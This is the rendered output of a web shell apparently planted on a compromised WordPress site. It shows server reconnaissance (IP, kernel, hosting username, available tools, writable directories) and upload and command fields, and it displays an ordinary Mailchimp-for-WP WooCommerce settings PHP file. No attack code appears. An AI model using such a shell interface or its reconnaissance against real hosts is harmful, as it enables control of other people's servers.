403Webshell
Server IP : 213.186.33.4  /  Your IP : 216.73.216.146
Web Server : Apache
System : Linux webm005.cluster103.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
User : karinebmkh ( 644538)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/karinebmkh/www2/wp-content/plugins/mailchimp-for-wp/integrations/woocommerce/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/karinebmkh/www2/wp-content/plugins/mailchimp-for-wp/integrations/woocommerce/admin-after.php
<?php

$position_options = array(
    'checkout_billing' => __("After billing details", 'mailchimp-for-wp'),
    'checkout_shipping' => __('After shipping details', 'mailchimp-for-wp'),
    'checkout_after_customer_details' => __('After customer details', 'mailchimp-for-wp'),
    'review_order_before_submit' => __('Before submit button', 'mailchimp-for-wp'),
    'after_order_notes' => __( "After order notes", 'mailchimp-for-wp' ),
);


/** @var MC4WP_Integration $integration */

?>
<table class="form-table">
	<?php $config = array( 'element' => 'mc4wp_integrations['. $integration->slug .'][implicit]', 'value' => '0' ); ?>
	<tr valign="top" data-showif="<?php echo esc_attr(json_encode($config)); ?>">
		<th scope="row">
			<?php _e('Position', 'mailchimp-for-wp'); ?>
		</th>
		<td>
			<select name="mc4wp_integrations[<?php echo $integration->slug; ?>][position]">
				<?php

                foreach ($position_options as $value => $label) {
                    printf('<option value="%s" %s>%s</option>', esc_attr($value), selected($value, $opts['position'], false), esc_html($label));
                }
                ?>

			</select>
		</td>
	</tr>
</table>

Youez - 2016 - github.com/yon3zu
LinuXploit